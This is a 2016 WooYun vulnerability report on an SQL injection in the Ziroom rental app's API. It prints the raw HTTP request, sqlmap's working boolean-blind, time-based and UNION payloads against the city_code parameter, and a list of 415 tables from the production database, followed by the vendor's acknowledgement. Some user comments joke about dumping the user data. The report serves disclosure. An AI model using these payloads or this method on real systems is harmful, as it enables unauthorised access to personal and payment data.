当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199365

漏洞标题:自如友家APP的SQL注射漏洞涉及415个表198万多数据

相关厂商:homelink.com.cn

漏洞作者: 路人甲

提交时间:2016-04-22 17:16

修复时间:2016-06-06 21:30

公开时间:2016-06-06 21:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

自如友家APP sql注射漏洞涉及415个表198万多数据

详细说明:

链接及参数:
POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Host: interfaces.ziroom.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01

漏洞证明:

[*] starting at 16:55:01
[16:55:01] [INFO] parsing HTTP request from 'yy.txt'
[16:55:02] [INFO] resuming back-end DBMS 'mysql'
[16:55:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city_code (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)-- sKhk&app=v3.3.1&os=android:5.1&model=8681-A01
---
[16:55:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.22
back-end DBMS: MySQL 5.0.12
[16:55:02] [INFO] fetching tables for database: 'newziroom'
[16:55:02] [INFO] the SQL query used returns 415 entries
Database: newziroom
[415 tables]
+--------------------------------------+
| user |
| active_sz_yushouka |
| activity_wx_plus_2 |
| api_house_shelf_apply |
| api_house_shelf_following |
| api_house_shelf_reason |
| cash |
| cash_tmp |
| cms_activity_manage |
| cms_huilei_apply |
| cms_huilei_house |
| cms_serverinfo_manage |
| collection |
| complain |
| complain_content |
| log_crm_request |
| m_look_push |
| m_msg_guanjia |
| m_msg_jpush |
| m_msg_ziroomer |
| m_newsign_order_jdloan_refund_log |
| m_newsign_orders_log |
| m_payment_callback_log |
| m_user_count_log |
| m_will_about_user_detail |
| m_zwp_appointment_look |
| member_list |
| operation_log |
| pay_cron_list |
| pay_order |
| pay_order_success |
| pay_terraceorder_success |
| payment_order |
| payment_order_callback_log |
| shhsh_recommended_user_info |
| shhsh_ziroomer_info |
| steward |
| sz_seed_plan |
| sz_seed_plan_pic |
| sz_seed_plan_question |
| szhsh_recommended_user_info |
| szhsh_ziroomer_info |
| t_400_day_detail |
| t_account_log |
| t_active_base |
| t_admin_auth |
| t_ams_book_api |
| t_appointment |
| t_area |
| t_arrange |
| t_award |
| t_award_getting |
| t_award_hd |
| t_award_list |
| t_award_movie |
| t_awardlist |
| t_awardlist_bak |
| t_baojie_decode_action |
| t_baojie_pay_centre_action |
| t_baojie_pay_click_action |
| t_base |
| t_bills |
| t_blacklist |
| t_blind_base |
| t_blind_vote |
| t_bookonline_customer |
| t_business |
| t_business_bak |
| t_cards_log |
| t_chest_points |
| t_chest_vote |
| t_city |
| t_citys |
| t_cms_account_log |
| t_cms_activityApp |
| t_cms_activityApp_body |
| t_cms_activityApp_detail |
| t_cms_ad |
| t_cms_ad_index |
| t_cms_ad_index_pic |
| t_cms_ad_keywords |
| t_cms_ad_new |
| t_cms_ad_new_pic |
| t_cms_ad_room |
| t_cms_ad_room_category |
| t_cms_ad_room_phone |
| t_cms_administrator |
| t_cms_app_version |
| t_cms_cdotp_activity |
| t_cms_change_log |
| t_cms_customer_message |
| t_cms_faq |
| t_cms_faq_list |
| t_cms_friend_message |
| t_cms_gift_init |
| t_cms_html |
| t_cms_links |
| t_cms_links_modules |
| t_cms_links_type |
| t_cms_m_keywords |
| t_cms_m_room |
| t_cms_m_room_category |
| t_cms_message_log |
| t_cms_newsblogs_list |
| t_cms_newsblogs_list_01 |
| t_cms_newsblogs_type |
| t_cms_newsblogs_type_01 |
| t_cms_newyear |
| t_cms_part |
| t_cms_part_search |
| t_cms_part_search_copy |
| t_cms_project |
| t_cms_qa |
| t_cms_qa_type |
| t_cms_sales_manage |
| t_cms_same_city |
| t_cms_service_answer |
| t_cms_service_guide |
| t_cms_service_question |
| t_cms_service_star |
| t_cms_subwayadvers |
| t_cms_svr_tool |
| t_cms_sys_message |
| t_cms_tax |
| t_cms_up_project |
| t_cms_user |
| t_cms_user1 |
| t_cms_user20150816 |
| t_cms_user20160125 |
| t_cms_user_0125XU |
| t_cms_user_20160125bak |
| t_cms_user_copy |
| t_cms_user_old |
| t_cms_user_zx0126 |
| t_cms_vanke_activity |
| t_cms_warmprompt |
| t_cms_xiaoqu_feature |
| t_cms_xiaoqu_feature_photo |
| t_cms_year_order |
| t_cms_ziroom_announcement |
| t_cms_ziroomer_category |
| t_cms_ziroomer_cheer |
| t_cms_ziroomer_commendatory_letter |
| t_cms_ziroomer_index |
| t_cms_ziroomer_shop |
| t_cms_ziroommanager |
| t_cms_ziruyu_story |
| t_common_account |
| t_common_actual_account |
| t_community_around |
| t_complain |
| t_contract |
| t_contract_book |
| t_contract_book_payVoucher |
| t_contract_cards |
| t_contract_chest |
| t_contract_direct |
| t_contract_direct_active_log |
| t_contract_direct_activities |
| t_contract_direct_activities_bak |
| t_contract_direct_activities_log |
| t_contract_direct_api_log |
| t_contract_direct_api_log_old |
| t_contract_direct_cust |
| t_contract_direct_payVoucher |
| t_contract_direct_promotion |
| t_contract_direct_property1 |
| t_contract_direct_property2 |
| t_contract_direct_property3 |
| t_contract_direct_receipt |
| t_contract_direct_renter |
| t_contract_direct_renter_log |
| t_contract_direct_step_log |
| t_contract_direct_substep |
| t_contract_direct_upcust_log |
| t_contract_insert |
| t_contract_insert_api_log |
| t_contract_insert_receipt |
| t_contract_jingdong |
| t_contract_log |
| t_contract_online |
| t_contract_receipt_retry_list |
| t_contract_renew |
| t_contract_reservation |
| t_contract_reservation_active_log |
| t_contract_reservation_comment |
| t_contract_reservation_customer |
| t_contract_reservation_customer_log |
| t_contract_reservation_customer_mlog |
| t_contract_reservation_house |
| t_contract_reservation_pay_list |
| t_contract_reservation_pay_log |
| t_contract_reservation_refund |
| t_contract_ziruyu_contract_complete |
| t_contract_ziruyu_error |
| t_contract_ziruyu_pay_callback |
| t_contract_ziruyu_pay_complete |
| t_contract_ziruyu_pay_url_log |
| t_contract_ziruyu_sync_log |
| t_coupon_card |
| t_coupon_card_160203 |
| t_coupon_card_bak |
| t_crm_book_look |
| t_crm_book_look_msg |
| t_crm_contract_house_belonger |
| t_crm_customer |
| t_crm_customer_msg |
| t_crm_data_report |
| t_crm_direct |
| t_crm_following |
| t_crm_lease |
| t_crm_lease_con |
| t_crm_lease_operate |
| t_crm_lookhouse |
| t_crm_lookhouse_msg |
| t_crm_lookhouse_wi |
| t_crm_notify |
| t_crm_relation |
| t_crm_relation_item |
| t_crm_relation_new |
| t_crm_reservation |
| t_crm_work_all |
| t_crm_work_log |
| t_customer |
| t_customer_rating |
| t_cycle |
| t_cycle_face |
| t_dakehu_comment |
| t_dakehu_groupCustomers |
| t_dakehu_new |
| t_dakehu_notice |
| t_dakehu_teamwork |
| t_dakehu_teamwork_content |
| t_dict |
| t_dict_school |
| t_district |
| t_district_bak |
| t_district_business |
| t_district_business_bak |
| t_dspeak |
| t_duanzu_apply |
| t_duanzu_rss |
| t_ehr_dept |
| t_ehr_dept_log |
| t_ehr_job |
| t_ehr_job_log |
| t_ehr_person |
| t_ehr_person_log |
| t_exist_pic_house |
| t_feedback |
| t_function |
| t_general_consumption_api_log |
| t_general_consumption_customer |
| t_general_consumption_detail |
| t_general_consumption_operation_log |
| t_general_consumption_status |
| t_general_consumption_temp |
| t_general_consumption_type |
| t_general_receipt_detail |
| t_general_receipt_stand_num |
| t_gift |
| t_gift_bak |
| t_gift_bat |
| t_gift_by_user |
| t_gift_by_user_s |
| t_gift_cms_admin |
| t_gift_gj |
| t_gift_gj_s |
| t_guest |
| t_haiyan_tour |
| t_house |
| t_house_room_lock |
| t_index_ziroomer |
| t_index_ziroomer_wb |
| t_integral_add_log |
| t_intention_house_info |
| t_ios_channel |
| t_ios_msg |
| t_keyword |
| t_log |
| t_login_log |
| t_loginlog |
| t_map_building |
| t_map_content |
| t_map_suggestion |
| t_map_type |
| t_memecache_queue_log |
| t_menu |
| t_move_house |
| t_order_log |
| t_order_pay_log |
| t_pay |
| t_pay_account |
| t_pay_account_relet |
| t_pay_actual_account |
| t_pay_actual_account_relet |
| t_pay_plan |
| t_pay_plan_direct |
| t_pay_plan_online |
| t_pay_plan_renew |
| t_payment_log |
| t_payment_receipt |
| t_penalty_change_log |
| t_penalty_plan |
| t_permission |
| t_permission_group |
| t_profile |
| t_project_images |
| t_province |
| t_quality_rating |
| t_question |
| t_questionnaire |
| t_rebate |
| t_recruit |
| t_recruit_detail |
| t_referee |
| t_referee_card |
| t_referee_card_send_record |
| t_referee_question_answer |
| t_relation_recruit |
| t_renew_apply |
| t_renew_expire |
| t_repair |
| t_role |
| t_room |
| t_room_pictures_new |
| t_room_promotion |
| t_room_promotion_type |
| t_seekziroomer_base |
| t_seekziroomer_vote |
| t_sellcontrol_log |
| t_service_common_question_keyword |
| t_soap_bind_phone |
| t_soap_bind_phone20160125 |
| t_soap_bind_phone20160125bak |
| t_soap_bind_phone_0125XU |
| t_soap_bind_phone_160315 |
| t_soap_bind_phone_160412 |
| t_soap_bind_phone_bak20150814 |
| t_soap_bind_phone_zx0126 |
| t_sowing |
| t_special |
| t_steward_business |
| t_steward_business_20150505 |
| t_sub_station |
| t_subway |
| t_subway_station |
| t_subway_station_bak |
| t_suding_house |
| t_suding_order |
| t_suding_pay_log |
| t_suding_refund_log |
| t_suding_reservation |
| t_suding_term |
| t_suding_yuyue |
| t_summer |
| t_temp_contract_activity |
| t_temp_jd_activity_lottery |
| t_temp_jd_activity_winner_list |
| t_ticket |
| t_trends |
| t_update_login |
| t_user |
| t_user_appointment |
| t_user_date |
| t_web_navigation |
| t_www_ziruyu_yuyue |
| t_zhuanti_color_life |
| t_ziroomlife_activity |
| t_ziroomlife_bulletin |
| t_ziroomlife_businessinfo |
| t_ziroomlife_neighborreminder |
| t_ziroomlife_news |
| t_ziroomlife_vote |
| t_ziruyu_activity |
| t_ziruyu_winner |
| t_ziruyu_yuyue |
| t_zrsd_log |
| temp_table1 |
| test |
| tmp |
| tmp_newziroom_xiazhi |
| tmp_xiazhi |
| u_general_receipt_callback_log |
| u_general_receipt_order |
| u_general_receipt_order_callback |
| u_general_receipt_to_crm_error |
| u_general_receipt_to_crm_log |
| unfirst_pay_internal_consu |
| unfirst_pay_notify_log |
| unfirst_pay_order |
| unfirst_pay_post_log |
| unfirst_pay_return_log |
| v_room |
| v_roomandcustomer |
| wx_activity |
| wx_credit_record |
| wx_credit_total |
| wx_move_code |
| wx_user |
| ziroom_flat |
| ziroom_simple_life |
| zrlife |
| zsl_activity_info |
| zsl_pic_address |
| zsl_vote_info |
| zsl_ziroomer_info |
| zwp_archives_evaluation |
| zwp_archives_surrounding |
| zwp_groups |
| zwp_nums |
| zwp_permission |
| zwp_permission_relation |
| zwp_user_group_relation |
| zwp_user_group_relation_copy |
+--------------------------------------+
[16:55:02] [INFO] fetched data logged to text files under

2.png


1.png


修复方案:

参数过滤!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-22 21:24

厂商回复:

老代码问题,感谢提醒正在处理!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-22 20:24 | Freebug ( 普通白帽子 | Rank:106 漏洞数:39 | 流氓是一种高尚的职业!)

    前排火速留名。

  2. 2016-04-22 22:54 | 踏歌公子 ( 普通白帽子 | Rank:241 漏洞数:50 | 江湖夜雨卌年灯,一剑一箫入红尘!碎心江...)

    @xsser 这样的厂商我也是呵呵了,如果是一个攻击者他会管你是不是老代码还是新代码?他知道你现在业务代码有漏洞他可以脱你451个表及某个user表的198万数据,6rank充分说明了厂商眼里用户的数据是多么廉价,作为自如的租户我表示厂商对安全的理解就是个渣!

  3. 2016-04-22 22:55 | 踏歌公子 ( 普通白帽子 | Rank:241 漏洞数:50 | 江湖夜雨卌年灯,一剑一箫入红尘!碎心江...)

    @踏歌公子 415

  4. 2016-04-22 23:00 | Freebug ( 普通白帽子 | Rank:106 漏洞数:39 | 流氓是一种高尚的职业!)

    @踏歌公子 +1

  5. 2016-04-22 23:32 | 孤独男孩 ( 实习白帽子 | Rank:44 漏洞数:15 | 专注网络信息安全,漏洞发掘,代码审核,云...)

    @踏歌公子 +1

  6. 2016-04-22 23:38 | prolog ( 普通白帽子 | Rank:853 漏洞数:179 )

    @踏歌公子 +1

  7. 2016-04-23 04:29 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    现在APP漏洞真心廉价,先把裤子down了做大数据去。

  8. 2016-06-06 21:40 | heartk ( 普通白帽子 | Rank:122 漏洞数:33 | 保存心中那份热情,坚持心中那份梦想。)

    @孤独男孩 +1

  9. 2016-06-06 21:40 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    @踏歌公子 +1 求裤子